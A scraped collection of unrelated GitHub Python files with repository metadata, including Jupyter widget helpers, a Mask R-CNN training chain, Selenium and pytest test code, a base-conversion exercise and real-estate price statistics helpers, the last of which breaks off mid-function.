for spec in self.spec_combo:
args_dict = self.produce_arg(spec)
if len(args_dict) == len(spec):
break
else:
args_dict = self.produce_arg(self.sig)
with self.output_widget:
try:
self.output_widget.layout.border = "0px"
print(f" : {str(self.fattr(**args_dict))}")
except Exception as e:
self.output_widget.layout.border = ERROR_STYLE
print(e)
print(
" : could not be computed one or more parameter is missing - check below for missing parameters"
)
if self.spec_combo:
for spec in self.spec_combo:
self.error_message(spec)
else:
self.error_message(self.sig)
def _create_label(label, color="black"):
"""
Creates a label widget with the given text and color.
Parameters
----------
label: `str`
Text of the label
color: `str`
Color of the label, defaults to black
"""
# This is done so voila switches colors according to theme
color_param = f"color:{color}" if color != "black" else ""
return widgets.HTML(f"<h3 style='margin:0px;{color_param}'>{label}<h3>")
def _handle_button_click(event):
"""
Handles the click event of the calculate properties button.
"""
for fn in _process_queue:
fn.process()
def _handle_clear_click(event):
"""
Handles the click event of the clear properties button.
Clears output of all functions.
"""
for fn in _process_queue:
fn.output_widget.clear_output()
def _colored_text(color, text):
"""
Prepares an inline string with the given color.
Parameters
----------
color: `list`
RGB color of the text
text: `str`
Text to be colored
Returns
-------
`str`
Colored text
"""
return f"\033[38;2;{color[0]};{color[1]};{color[2]}m{text} \033[38;2;255;255;255m"
_calculate_button = widgets.Button(
description="Calculate Properties", button_style="info"
)
_calculate_button.on_click(_handle_button_click)
_clear_button = widgets.Button(description="Clear Output", button_style="danger")
_clear_button.on_click(_handle_clear_click)
def _create_widget(widget_type, **kwargs):
"""
Creates a widget of the given type with the given parameters.
Widget can be with/without units dropdown.
Parameters
----------
widget_type: `any`
Type of the widget to be created
**kwargs: `dict`
Parameters specific to the widget
Returns
-------
`~ipywidgets.widgets.Widget or [~ipywidgets.widgets.Widget, ~ipywidgets.widgets.Widget]`
widget or [widget, units_dropdown]
"""
unit = None
placeholder = None
opts = None
if "unit" in kwargs:
unit = kwargs["unit"]
del kwargs["unit"]
if "placeholder" in kwargs:
placeholder = kwargs["placeholder"]
del kwargs["placeholder"]
if "opts" in kwargs:
opts = kwargs["opts"]
del kwargs["opts"]
widget_element = widget_type(**kwargs)
widget_element.create_widget()
if unit:
widget_element.set_unit(unit)
if placeholder:
widget_element.set_place_holder(placeholder)
if opts:
widget_element.attach_units_dropdown(opts)
return [widget_element.get_widget(), widget_element.get_dropdown_widget()]
else:
return widget_element.get_widget()
| [
"noreply@github.com"
] | noreply@github.com |
d857d210c85ab7e5b44aa427f2403019ebe176a1 | f08d137b7821d79672c91e5f06967ffa1f90e278 | /.history/Python/Main_py_20211021101357.py | 24180ebf2cf62ee0838fe71a2cd46e81d5e858e6 | [] | no_license | anhviet-key/hello-cac-ban | a39ffb1731a77dd171523ea145f5d8b62fccde7c | 18411b51add7e3277d42869f8a50c67111337983 | refs/heads/main | 2023-08-23T09:02:01.074958 | 2021-10-27T07:48:47 | 2021-10-27T07:48:47 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 220 | py | from Sub_py import emailProcess, print_Mess
def main():
emails = ["hello.vi@gmail.com", "Package@yahoo.com", "Test@gmail.dev"]
for email in emails:
usemailProcess(email)
if __name__ == "__main__":
main()
| [
"92666546+anhviet-key@users.noreply.github.com"
] | 92666546+anhviet-key@users.noreply.github.com |
a7da83c154c9480e68fc45b27de2fc75c7bd51ce | 5bfd97b3ed5b173af6d97cbed91fe4cbeb9d5690 | /901_recommendation/plots.py | 6b573a9702b23a39ebbe973c8ec8bab6096177b4 | [] | no_license | AndersonJo/python-lab | dce6c1e96313ce339153c3aaf13b052581113726 | eafbeddc7a7706377478282252806de3a56cc5bb | refs/heads/master | 2020-03-22T20:54:26.708450 | 2018-10-30T05:56:50 | 2018-10-30T05:56:50 | 140,641,201 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,040 | py | from random import uniform
import pylab as p
from data import critics
def display_critics(name1, name2):
"""
plot the two critics' movie scores.
@param name1 (str): the name of a critic
@param name2 (str): the name of a critic
"""
movies1 = critics.get(name1, None)
movies2 = critics.get(name2, None)
si_names = [n for n in movies1 if movies2.has_key(n)]
_init_plot()
p.xlabel(name1)
p.ylabel(name2)
for m_name in si_names:
score1 = movies1[m_name]
score2 = movies2[m_name]
r = uniform(0, 0.2)
p.plot(score1, score2 + r, 'D')
p.text(score1, score2 + r, m_name)
p.show()
def display_all_critics():
for name1 in critics:
for name2 in critics:
if name1 == name2:
continue
display_critics(name1, name2)
def display_movies(movie1, movie2):
"""
plot the two critics' movie scores.
@param name1 (str):
@param name2 (str): the name of a critic
"""
_init_plot()
p.xlabel(movie1)
p.ylabel(movie2)
critic_names = [name for name, scores in critics.items() if scores.has_key(movie1) and scores.has_key(movie2)]
for c_name in critic_names:
a_score = critics[c_name][movie1]
b_score = critics[c_name][movie2]
p.plot(a_score + uniform(0, 0.1), b_score + uniform(0, 0.1), '^')
p.text(a_score, b_score + uniform(0, 0.3), c_name.split(' ')[0])
p.show()
def display_all_movies():
movie_names = []
for movies in critics.values():
for movie_name in movies:
if movie_name not in movie_names:
movie_names.append(movie_name)
for name1 in movie_names:
for name2 in movie_names:
if name1 == name2:
continue
display_movies(name1, name2)
def _init_plot():
p.figure(1)
p.grid()
p.xlim(0, 6)
p.ylim(0, 6)
p.xticks(p.arange(0, 6, 0.5), p.arange(0, 6, 0.5))
p.yticks(p.arange(0, 6, 0.5), p.arange(0, 6, 0.5)) | [
"a141890@gmail.com"
] | a141890@gmail.com |
e782fadcca8915536908baee95741f6ecdf8ee5d | 63d1f90e4f32cc179635b50597fb264d77a8149d | /ceaos/__init__.py | ee66221e89d5f6cc061a3f4472e5abad0e404b7b | [] | no_license | kxu11235/cea-os | 6474fbfd0cd632d40693f472abf5c7f700ab9772 | 851639a609a4a238bbefedf191a8d0eaf567ed20 | refs/heads/main | 2023-06-01T07:39:30.098497 | 2021-06-09T16:43:47 | 2021-06-09T16:43:47 | 375,759,475 | 0 | 0 | null | 2021-06-10T16:15:44 | 2021-06-10T16:15:43 | null | UTF-8 | Python | false | false | 71 | py | # CEA-OS is an operating system for controlled environment agriculture
| [
"nandan.t@live.com"
] | nandan.t@live.com |
89315f19c44ce6a4e4989a4db8b8892a9ebb7e53 | d154b2c87c1ac29b008acbcfe7dbf1f904f72840 | /FirstLab/venv/Scripts/pip3-script.py | 8a1386c20815cc18abfa22301321e849233b9caf | [] | no_license | sophiacrumb/BDAS | 4cb1ede2022f7ef49e182be2ecb7a21faedff1f5 | 02576e057c7835ff506eb68eb9fccdc952e078f1 | refs/heads/main | 2022-12-31T08:07:55.880154 | 2020-10-20T16:13:45 | 2020-10-20T16:13:45 | 303,101,692 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 402 | py | #!D:\PycharmProjects\FirstLab\venv\Scripts\python.exe
# EASY-INSTALL-ENTRY-SCRIPT: 'pip==19.0.3','console_scripts','pip3'
__requires__ = 'pip==19.0.3'
import re
import sys
from pkg_resources import load_entry_point
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(
load_entry_point('pip==19.0.3', 'console_scripts', 'pip3')()
)
| [
"sophiacrumb@yandex.ru"
] | sophiacrumb@yandex.ru |
596b45507c8239328799775cbfed3e1258342f5c | 11f5ff0c46b1ed0d89a2b582bea6d91432563ff2 | /conftest.py | f560e935abaee6394bf5fff41d6d6f7d26baa25d | [] | no_license | hfridland/test_items | 829e76ba7cf66cd2d417a1033e7d47425f029e2a | f335c97dc1e26a706f05c6cd26e58804dce61da9 | refs/heads/main | 2023-05-22T10:49:16.537579 | 2021-06-05T18:45:17 | 2021-06-05T18:45:17 | 374,188,484 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 427 | py | import pytest
from selenium import webdriver
def pytest_addoption(parser):
parser.addoption('--language', action='store', default=None,
help="Choose user language")
@pytest.fixture(scope="function")
def browser(request):
browser = webdriver.Chrome()
yield browser
browser.quit()
@pytest.fixture(scope="function")
def language(request):
return request.config.getoption("language")
| [
"hfridland@shaw.ca"
] | hfridland@shaw.ca |
d00a26baca490f31f439effc72c908cdb5f1a988 | f8bdc46409c9f5eaf3d85ef157260589462d941a | /demos/instance_occlsegm/instance_occlsegm_lib/contrib/instance_occlsegm/models/mask_rcnn/mask_rcnn_train_chain.py | dcac6d9a34651571c6619b60979f08467e428520 | [
"MIT",
"BSD-3-Clause"
] | permissive | start-jsk/jsk_apc | 2e268f8b65e9d7f4f9cc4416dc8383fd0a7b9750 | c4e349f45ef38457dc774e33f6902acf1a1540a6 | refs/heads/master | 2023-09-05T09:06:24.855510 | 2023-09-01T17:10:12 | 2023-09-01T17:10:12 | 25,620,908 | 36 | 25 | NOASSERTION | 2023-09-01T17:10:14 | 2014-10-23T05:28:31 | Common Lisp | UTF-8 | Python | false | false | 9,218 | py | # Modified works:
# --------------------------------------------------------
# Copyright (c) 2017 - 2018 Kentaro Wada.
# Licensed under The MIT License [see LICENSE for details]
# --------------------------------------------------------
# This is modified work of FasterRCNNTrainChain:
# --------------------------------------------------------
# Copyright (c) 2017 Preferred Networks, Inc.
# Licensed under The MIT License [see LICENSE for details]
# https://github.com/chainer/chainercv
# --------------------------------------------------------
import numpy as np
import chainer
from chainer import cuda
import chainer.functions as F
from chainercv.links.model.faster_rcnn.utils.anchor_target_creator import\
AnchorTargetCreator
from .utils import ProposalTargetCreator
class MaskRCNNTrainChain(chainer.Chain):
"""Calculate losses for Faster R-CNN and report them.
This is used to train Faster R-CNN in the joint training scheme
[#FRCNN]_.
The losses include:
* :obj:`rpn_loc_loss`: The localization loss for \
Region Proposal Network (RPN).
* :obj:`rpn_cls_loss`: The classification loss for RPN.
* :obj:`roi_loc_loss`: The localization loss for the head module.
* :obj:`roi_cls_loss`: The classification loss for the head module.
.. [#FRCNN] Shaoqing Ren, Kaiming He, Ross Girshick, Jian Sun. \
Faster R-CNN: Towards Real-Time Object Detection with \
Region Proposal Networks. NIPS 2015.
Args:
faster_rcnn (~chainercv.links.model.faster_rcnn.FasterRCNN):
A Faster R-CNN model that is going to be trained.
rpn_sigma (float): Sigma parameter for the localization loss
of Region Proposal Network (RPN). The default value is 3,
which is the value used in [#FRCNN]_.
roi_sigma (float): Sigma paramter for the localization loss of
the head. The default value is 1, which is the value used
in [#FRCNN]_.
anchor_target_creator: An instantiation of
:obj:`chainercv.links.model.faster_rcnn.AnchorTargetCreator`.
proposal_target_creator_params: An instantiation of
:obj:`chainercv.links.model.faster_rcnn.ProposalTargetCreator`.
"""
def __init__(self, mask_rcnn, rpn_sigma=3., roi_sigma=1.,
anchor_target_creator=AnchorTargetCreator(),
proposal_target_creator=ProposalTargetCreator(),
):
super(MaskRCNNTrainChain, self).__init__()
with self.init_scope():
self.mask_rcnn = mask_rcnn
self.rpn_sigma = rpn_sigma
self.roi_sigma = roi_sigma
self.anchor_target_creator = anchor_target_creator
self.proposal_target_creator = proposal_target_creator
self.loc_normalize_mean = mask_rcnn.loc_normalize_mean
self.loc_normalize_std = mask_rcnn.loc_normalize_std
def __call__(self, imgs, bboxes, labels, masks, scales):
"""Forward Faster R-CNN and calculate losses.
Here are notations used.
* :math:`N` is the batch size.
* :math:`R` is the number of bounding boxes per image.
Currently, only :math:`N=1` is supported.
Args:
imgs (~chainer.Variable): A variable with a batch of images.
bboxes (~chainer.Variable): A batch of bounding boxes.
Its shape is :math:`(N, R, 4)`.
labels (~chainer.Variable): A batch of labels.
Its shape is :math:`(N, R)`. The background is excluded from
the definition, which means that the range of the value
is :math:`[0, L - 1]`. :math:`L` is the number of foreground
classes.
scale (float or ~chainer.Variable): Amount of scaling applied to
the raw image during preprocessing.
Returns:
chainer.Variable:
Scalar loss variable.
This is the sum of losses for Region Proposal Network and
the head module.
"""
if isinstance(bboxes, chainer.Variable):
bboxes = bboxes.data
if isinstance(labels, chainer.Variable):
labels = labels.data
if isinstance(scales, chainer.Variable):
scales = scales.data
scales = cuda.to_cpu(scales)
batch_size, _, H, W = imgs.shape
img_size = (H, W)
features = self.mask_rcnn.extractor(imgs)
rpn_locs, rpn_scores, rois, roi_indices, anchor = self.mask_rcnn.rpn(
features, img_size, scales)
if any(len(b) == 0 for b in bboxes):
return chainer.Variable(self.xp.array(0, dtype=np.float32))
batch_indices = range(batch_size)
sample_rois = []
sample_roi_indices = []
gt_roi_locs = []
gt_roi_labels = []
gt_roi_masks = []
for batch_index, bbox, label, mask in \
zip(batch_indices, bboxes, labels, masks):
roi = rois[roi_indices == batch_index]
sample_roi, gt_roi_loc, gt_roi_label, gt_roi_mask = \
self.proposal_target_creator(roi, bbox, label, mask)
del roi
sample_roi_index = self.xp.full(
(len(sample_roi),), batch_index, dtype=np.int32)
sample_rois.append(sample_roi)
sample_roi_indices.append(sample_roi_index)
del sample_roi, sample_roi_index
gt_roi_locs.append(gt_roi_loc)
gt_roi_labels.append(gt_roi_label)
gt_roi_masks.append(gt_roi_mask)
del gt_roi_loc, gt_roi_label, gt_roi_mask
sample_rois = self.xp.concatenate(sample_rois, axis=0)
sample_roi_indices = self.xp.concatenate(sample_roi_indices, axis=0)
gt_roi_locs = self.xp.concatenate(gt_roi_locs, axis=0)
gt_roi_labels = self.xp.concatenate(gt_roi_labels, axis=0)
gt_roi_masks = self.xp.concatenate(gt_roi_masks, axis=0)
roi_cls_locs, roi_scores, roi_masks = self.mask_rcnn.head(
features, sample_rois, sample_roi_indices)
# RPN losses
gt_rpn_locs = []
gt_rpn_labels = []
for bbox, rpn_loc, rpn_score in zip(bboxes, rpn_locs, rpn_scores):
gt_rpn_loc, gt_rpn_label = self.anchor_target_creator(
bbox, anchor, img_size)
gt_rpn_locs.append(gt_rpn_loc)
gt_rpn_labels.append(gt_rpn_label)
del gt_rpn_loc, gt_rpn_label
gt_rpn_locs = self.xp.concatenate(gt_rpn_locs, axis=0)
gt_rpn_labels = self.xp.concatenate(gt_rpn_labels, axis=0)
rpn_locs = F.concat(rpn_locs, axis=0)
rpn_scores = F.concat(rpn_scores, axis=0)
rpn_loc_loss = _fast_rcnn_loc_loss(
rpn_locs, gt_rpn_locs, gt_rpn_labels, self.rpn_sigma)
rpn_cls_loss = F.sigmoid_cross_entropy(rpn_scores, gt_rpn_labels)
# Losses for outputs of the head.
n_sample = len(roi_cls_locs)
roi_cls_locs = roi_cls_locs.reshape((n_sample, -1, 4))
roi_locs = roi_cls_locs[self.xp.arange(n_sample), gt_roi_labels]
roi_loc_loss = _fast_rcnn_loc_loss(
roi_locs, gt_roi_locs, gt_roi_labels, self.roi_sigma)
roi_cls_loss = F.softmax_cross_entropy(roi_scores, gt_roi_labels)
# # Losses for outputs of mask branch
n_instance, n_fg_class_x_n_mask_class, roi_H, roi_W = roi_masks.shape
assert n_sample == n_instance
n_fg_class = self.mask_rcnn.n_class - 1
n_mask_class = n_fg_class_x_n_mask_class // n_fg_class
roi_masks = roi_masks.reshape(
(n_instance, n_mask_class, n_fg_class, roi_H, roi_W)
)
roi_mask_loss = F.softmax_cross_entropy(
roi_masks[np.arange(n_instance), :, gt_roi_labels - 1, :, :],
gt_roi_masks,
)
# roi_mask_loss = F.sigmoid_cross_entropy(
# roi_masks[np.arange(n_sample), gt_roi_labels - 1, :, :],
# gt_roi_masks)
loss = rpn_loc_loss + rpn_cls_loss + roi_loc_loss + roi_cls_loss + \
roi_mask_loss
chainer.reporter.report({'rpn_loc_loss': rpn_loc_loss,
'rpn_cls_loss': rpn_cls_loss,
'roi_loc_loss': roi_loc_loss,
'roi_cls_loss': roi_cls_loss,
'roi_mask_loss': roi_mask_loss,
'loss': loss},
self)
return loss
def _smooth_l1_loss(x, t, in_weight, sigma):
sigma2 = sigma ** 2
diff = in_weight * (x - t)
abs_diff = F.absolute(diff)
flag = (abs_diff.data < (1. / sigma2)).astype(np.float32)
y = (flag * (sigma2 / 2.) * F.square(diff) +
(1 - flag) * (abs_diff - 0.5 / sigma2))
return F.sum(y)
def _fast_rcnn_loc_loss(pred_loc, gt_loc, gt_label, sigma):
xp = chainer.cuda.get_array_module(pred_loc)
in_weight = xp.zeros_like(gt_loc)
# Localization loss is calculated only for positive rois.
in_weight[gt_label > 0] = 1
loc_loss = _smooth_l1_loss(pred_loc, gt_loc, in_weight, sigma)
# Normalize by total number of negtive and positive rois.
loc_loss /= xp.sum(gt_label >= 0)
return loc_loss
| [
"www.kentaro.wada@gmail.com"
] | www.kentaro.wada@gmail.com |
9afaba937a03de22be796a6bd07f246a6dced59f | 42b4211e959b797ba23089b70242ce7ba591c65b | /572_Subtree_of_Another_Tree.py | 21c7cb567a7173cbf2f7797c287c716fa73fd23e | [] | no_license | shauryasrivatava/devsnest_dsa | 7699de2f0707f27785137a72280b20ad5ddcd789 | 01274b1d2d623677a7512276599647ee5222bb6b | refs/heads/main | 2023-05-04T05:05:32.237159 | 2021-05-18T18:46:36 | 2021-05-18T18:46:36 | 348,429,262 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 772 | py | # Definition for a binary tree node.
# class TreeNode:
# def __init__(self, val=0, left=None, right=None):
# self.val = val
# self.left = left
# self.right = right
def same(s,t):
if s is None and t is None :
return True
if s is None or t is None:
return False
if s and t:
return s.val == t.val and same(s.left, t.left) and same(s.right, t.right)
# if s.val!=t.val:
# return False
# l=same(s.left,t.left)
# r=same(s.right,t.right)
# return l and r
class Solution:
def isSubtree(self, s: TreeNode, t: TreeNode) -> bool:
if s is None:
return False
if same(s,t):
return True
return self.isSubtree(s.left,t) or self.isSubtree(s.right,t)
| [
"noreply@github.com"
] | noreply@github.com |
4faf1c90487d459da70158af665f0ebc2c9cf364 | d75fc0ae459066bfb15187d1c902e22000153dc4 | /TestScript/tenderverificationONSupplierStatus.py | 44e27edee4b8c97a036372329b6aa5c7f6dc4e37 | [] | no_license | sureshkumarkadi/Project | 875a05a752164ff9620286ab8261c7774acc4f27 | 4652edfa6ac47d6f44bd41e03314d96753e09d92 | refs/heads/master | 2020-03-25T19:52:23.124215 | 2018-08-09T05:28:08 | 2018-08-09T05:28:08 | 144,104,609 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,308 | py | #-------------------------------------------------------------------------------
# Name: module2
# Purpose:
#
# Author: mathew.jacob
#
# Created: 25/08/2016
# Copyright: (c) mathew.jacob 2016
# Licence: <your licence>
#-------------------------------------------------------------------------------
from selenium.webdriver.support.ui import WebDriverWait
import unittest
import sys
import os
import time
import traceback
dir_path = os.path.dirname(os.path.realpath(__file__))
folder_path=os.path.abspath(os.path.join(dir_path, os.pardir))
sys.path.insert(0,folder_path+"\Library")
sys.path.insert(0,folder_path+"\Syslibrary")
sys.path.insert(0,folder_path+"\Data")
sys.path.insert(0,folder_path+"\Object")
from launcheTender import LauncheTenderclass
from tenderDetails import Tenderdetails
from tenderDetails import SubmitTenderclass
from datadriven import DataDriver
from setupenviron import setupValue
from logouteTender import Userprofilemenu
##from RESTAPI import ReopentenderusingRESTAPIclass
from RESTAPIStaging import ReopentenderusingRESTAPIclass
from logdriver import logvalue
logs=logvalue.logger
logclose=logvalue()
ftime = time.mktime(time.localtime())
ptime=time.strftime("%d-%m-%Y_%H%M%S", time.localtime(ftime))
#filename = 'TestCase-100358-{0}.png'.format(ptime)
tf = 'test_TenderverificationONSupplierStatus'
filename = 'Testcase-%s.png' %(tf)
path= setupValue().screenpath
fullpath = os.path.join(path,filename)
#Test case Number = 100358
class TenderverificationONSupplierStatus(unittest.TestCase):
def test_TenderverificationONSupplierStatus(self):
try:
browserInstance = setupValue()
browser = browserInstance.setupfunction()
browser.implicitly_wait(5)
time.sleep(1)
LauncheTender1 = LauncheTenderclass()
browser = LauncheTender1.openURL(browser)
browser.implicitly_wait(5)
time.sleep(1)
tenderDetails = Tenderdetails()
browser = LauncheTender1.subcontractorValidlogin(browser)
#browser = LauncheTender1.list_Organisation(browser)
#browser = LauncheTender1.verifyorganisationdetails(browser)
browser = LauncheTender1.list_project(browser)
time.sleep(1)
browser = tenderDetails.Subcontratorproject(browser)
time.sleep(2)
tenderverifySupplierstatus1 = DataDriver()
tenderverifySupplierstatus_path = tenderverifySupplierstatus1.readfromXML(folder_path+'\Object\TenderPage.xml','eTender','tenderverifySupplierstatus')
time.sleep(1)
tenderverifySupplierstatus = browser.find_element_by_xpath(tenderverifySupplierstatus_path) #Webelement for values
time.sleep(1)
self.assertEqual(tenderverifySupplierstatus.text,'Review pending')
logs.info("Test Case No : 100358 Passed Successfully")
except Exception:
logs.error("Validation with Test Case No: 100358 failed")
browser.save_screenshot(fullpath)
traceback.print_exc(file=sys.stdout)
self.fail("Test Case No: 100358 failed")
browser.implicitly_wait(5)
finally:
LauncheTender1.closebrowser(browser)
if __name__ == '__main__':
unittest.main() | [
"Suresh.Kumar@causeway.com"
] | Suresh.Kumar@causeway.com |
9dcddbcc8d5d3f81e9b43c1b674bb99bf74081e6 | 495943f075f6a641d456d66deebb208847cb6c50 | /bases/bases.py | 4b971bac31d64037ece100affafdb194b8cec092 | [] | no_license | LukazDane/CS-1.3 | 377a6ef77c3db4a497f492ed73a3ba2487531b93 | 9cee1f71b9374a54a1fe336cd1f8db1a51275ef8 | refs/heads/master | 2022-07-04T00:26:48.498036 | 2020-05-11T02:37:00 | 2020-05-11T02:37:00 | 255,189,216 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,209 | py | import string
import math
# ##### https://en.wikipedia.org/wiki/List_of_Unicode_characters
# Hint: Use these string constants to encode/decode hexadecimal digits and more
# string.digits is '0123456789'
# string.hexdigits is '0123456789abcdefABCDEF'
# string.ascii_lowercase is 'abcdefghijklmnopqrstuvwxyz'
# string.ascii_uppercase is 'ABCDEFGHIJKLMNOPQRSTUVWXYZ'
# string.ascii_letters is ascii_lowercase + ascii_uppercase
# string.printable is digits + ascii_letters + punctuation + whitespace
def decode(digits, base):
decoded = []
"""Decode given digits in given base to number in base 10.
digits: str -- string representation of number (in given base)
base: int -- base of given number
return: int -- integer representation of number (in base 10)"""
# Handle up to base 36 [0-9a-z]
assert 2 <= base <= 36, 'base is out of range: {}'.format(base)
# TODO: Decode digits from binary (base 2)
ndec = 0
digits = digits[::-1]
# if base == 2:
for i in range(len(digits)):
digit = int(digits[i], base=base)
ndec += digit * base ** i
return ndec
# elif base == 16:
# x = int(str(digits), 16)
# print(x)
# else:
# reverse the digits
# digits = digits[::-1]
# # print(digits)
# # variable to hold our answer
# num = 0
# # loop through each index
# for x in range(len(digits)):
# # variable to hold each index while we work it out
# uni = digits[x]
# if uni.isdigit():
# # if already a number (0-9) keep it
# uni = int(uni)
# # print(uni)
# else: # assumes alphabet
# # convert to unicode uppercase val, subtract calue of A and add 10 to get base 10 number
# uni = ord(uni.upper())-ord('A')+10
# # unicode a -> A = 65 | A(65) - A(65) + 10 = 10(a)
# # unicode b -> B = 66 | B(66) - A(65) + 10 = 11(b)
# # print(uni)
# num += uni*(base**x)
# decoded.append(num)
# print(decoded)
print(decode('1110 1100', 2))
print(decode('fff', 16))
print(decode("1a2b", 32))
def encode(number, base):
"""Encode given number in base 10 to digits in given base.
number: int -- integer representation of number (in base 10)
base: int -- base to convert to
return: str -- string representation of number (in given base)"""
# Handle up to base 36 [0-9a-z]
assert 2 <= base <= 36, 'base is out of range: {}'.format(base)
# Handle unsigned numbers only for now
assert number >= 0, 'number is negative: {}'.format(number)
# https://stackoverflow.com/questions/1181919/python-base-36-encoding
base_36 = string.digits + string.ascii_uppercase
result = []
while number > 0:
q = number / base
remainder = number % base
sep_q = str(q).split(".")
number = int(sep_q[0])
if 9 < remainder < base:
remainder = base_36[remainder].lower()
result.insert(0, str(remainder))
return "".join(result)
def convert(digits, base1, base2):
"""Convert given digits in base1 to digits in base2.
digits: str -- string representation of number (in base1)
base1: int -- base of given number
base2: int -- base to convert to
return: str -- string representation of number (in base2)"""
# Handle up to base 36 [0-9a-z]
assert 2 <= base1 <= 36, 'base1 is out of range: {}'.format(base1)
assert 2 <= base2 <= 36, 'base2 is out of range: {}'.format(base2)
decoded = decode(digits, base1)
return encode(decoded, base2)
def main():
"""Read command-line arguments and convert given digits between bases."""
import sys
args = sys.argv[1:] # Ignore script file name
if len(args) == 3:
digits = args[0]
base1 = int(args[1])
base2 = int(args[2])
# Convert given digits between bases
result = convert(digits, base1, base2)
print('{} in base {} is {} in base {}'.format(
digits, base1, result, base2))
else:
print('Usage: {} digits base1 base2'.format(sys.argv[0]))
print('Converts digits from base1 to base2')
if __name__ == '__main__':
main()
| [
"deandrevidal@aol.com"
] | deandrevidal@aol.com |
bc5eee51bb8fa035ca88cc586c8b806b2004d5e4 | 1cefaa5074569d972479fdc23b09d2cb70bc2332 | /apps/product/models.py | 7be7c81872b2e29b3673c58870fcbc1b78844f95 | [] | no_license | SazidAhmed/Django-Rest-Store-Server | 8cf5cfe8099686b6ef0952f72e29f69e9e995f9f | 99f98b4522913296867fdab38f4e53ce3596f200 | refs/heads/master | 2023-04-11T16:24:55.974446 | 2021-04-29T15:09:41 | 2021-04-29T15:09:41 | 357,680,599 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,059 | py | from io import BytesIO
from PIL import Image
from django.core.files import File
from django.db import models
class Category(models.Model):
name = models.CharField(max_length=255)
slug = models.SlugField()
class Meta:
ordering = ('name',)
class Meta:
verbose_name_plural = 'Categories'
def __str__(self):
return self.name
def get_absolute_url(self):
return f'/{self.slug}/'
class Product(models.Model):
category = models.ForeignKey(Category, related_name='products', on_delete=models.CASCADE)
name = models.CharField(max_length=255)
slug = models.SlugField()
description = models.TextField(blank=True, null=True)
price = models.DecimalField(max_digits=6, decimal_places=2)
image = models.ImageField(upload_to='uploads/', blank=True, null=True)
thumbnail = models.ImageField(upload_to='uploads/', blank=True, null=True)
date_added = models.DateTimeField(auto_now_add=True)
class Meta:
ordering = ('-date_added',)
def __str__(self):
return self.name
# def __str__(self):
# return '%s %s' % (self.name, self.category.slug)
def get_absolute_url(self):
return f'/{self.category.slug}/{self.slug}/'
def get_image(self):
if self.image:
return 'http://127.0.0.1:8000' + self.image.url
return ''
def get_thumbnail(self):
if self.thumbnail:
return 'http://127.0.0.1:8000' + self.thumbnail.url
else:
if self.image:
self.thumbnail = self.make_thumbnail(self.image)
self.save()
return 'http://127.0.0.1:8000' + self.thumbnail.url
else:
return ''
def make_thumbnail(self, image, size=(345, 397)):
img = Image.open(image)
img.convert('RGB')
img.thumbnail(size)
thumb_io = BytesIO()
img.save(thumb_io, 'JPEG', quality=85)
thumbnail = File(thumb_io, name=image.name)
return thumbnail | [
"sazidahmed.official@gmail.com"
] | sazidahmed.official@gmail.com |
0e4529c3d3b3619b12b70827cb8b534191dd1ce1 | 9804004f7518c825579a2a8b0cde8dd5a3ba82b2 | /project_alva/project_alva/machine_learning/model/stats.py | 625fa81bfdae90ed4616558eb7d9c409bb73ff9d | [] | no_license | encoder-90/ds_projects | df69b18f659c886e37fec8bff083da11d2d6dc3d | 97d3a5c6c2441aea10a2487656fd2c972c4ccfa0 | refs/heads/main | 2023-08-13T00:49:33.424616 | 2021-09-27T06:07:46 | 2021-09-27T06:07:46 | 320,169,391 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,593 | py | import numpy as np
import uuid
import pygal
from machine_learning.data import helper
def transform_target_y(data):
"""
Transform the target column y to natural log. This scales the target and helps to stabilize the outcome
by normally distributing the values.
NOTE: It needs to transform back with exponential e = 2.71828
"""
data.adj_price = np.log(data.adj_price)
return data
def reverse_log_transformation(result_df):
"""
https://numpy.org/doc/stable/reference/generated/numpy.exp.html
"""
result_df.adj_price = np.exp(result_df.adj_price)
result_df.model_price_prediction = np.exp(result_df.model_price_prediction)
return result_df
def get_data_subset_for_district(district):
"""
Data is cleaned, restructured and sliced base on the prediction district from the mapper data
"""
data = helper.load_scraper_data()
data = helper.restructure_initial_data(data)
data = helper.remove_missing_values(data)
data = helper.map_construction_type_to_en(data)
district_data = data.loc[data['district'] == district]
return district_data
def get_number_samples_mapper():
"""
Delete missing target rows - price from scrapper data and returns the number of rows for the new DataFrame
"""
data = helper.load_scraper_data()
data = helper.remove_missing_values(data)
rows = int(data.shape[0])
return rows
def get_stats_for_apartment_type(data_filter, column_name):
by_ap_type = data_filter.groupby('apartment_type')[column_name].mean()
return by_ap_type
def get_svg_bar_plot_district_mean_price_per_apartment_type(df_district, prediction_price):
mapping_type = {'1-STAEN': '1 ROOM', '2-STAEN': '2 ROOM', '3-STAEN': '3 ROOM', '4-STAEN': '4 ROOM',
'MNOGOSTAEN': '5+ ROOMS', 'MEZONET': 'PENTHOUSE', 'ATELIE': 'STUDIO'}
df_district['apartment_type'].replace(mapping_type, inplace=True)
mean_price_studio = 0
df_studio = df_district.loc[df_district['apartment_type'] == 'STUDIO']
if len(df_studio.index) != 0: mean_price_studio = int(round(df_studio["price"].mean(), 0))
mean_price_one_room = 0
df_one_room = df_district.loc[df_district['apartment_type'] == '1 ROOM']
if len(df_one_room.index) != 0: mean_price_one_room = int(round(df_one_room["price"].mean(), 0))
mean_price_two_room = 0
df_two_room = df_district.loc[df_district['apartment_type'] == '2 ROOM']
if len(df_two_room.index) != 0: mean_price_two_room = int(round(df_two_room["price"].mean(), 0))
mean_price_three_room = 0
df_three_room = df_district.loc[df_district['apartment_type'] == '3 ROOM']
if len(df_three_room.index) != 0: mean_price_three_room = int(round(df_three_room["price"].mean(), 0))
mean_price_four_room = 0
df_four_room = df_district.loc[df_district['apartment_type'] == '4 ROOM']
if len(df_four_room.index) != 0: mean_price_four_room = int(round(df_four_room["price"].mean(), 0))
mean_price_five_room = 0
df_five_plus_room = df_district.loc[df_district['apartment_type'] == '5+ ROOMS']
if len(df_five_plus_room.index) != 0: mean_price_five_room = int(round(df_five_plus_room["price"].mean(), 0))
mean_price_penthouse = 0
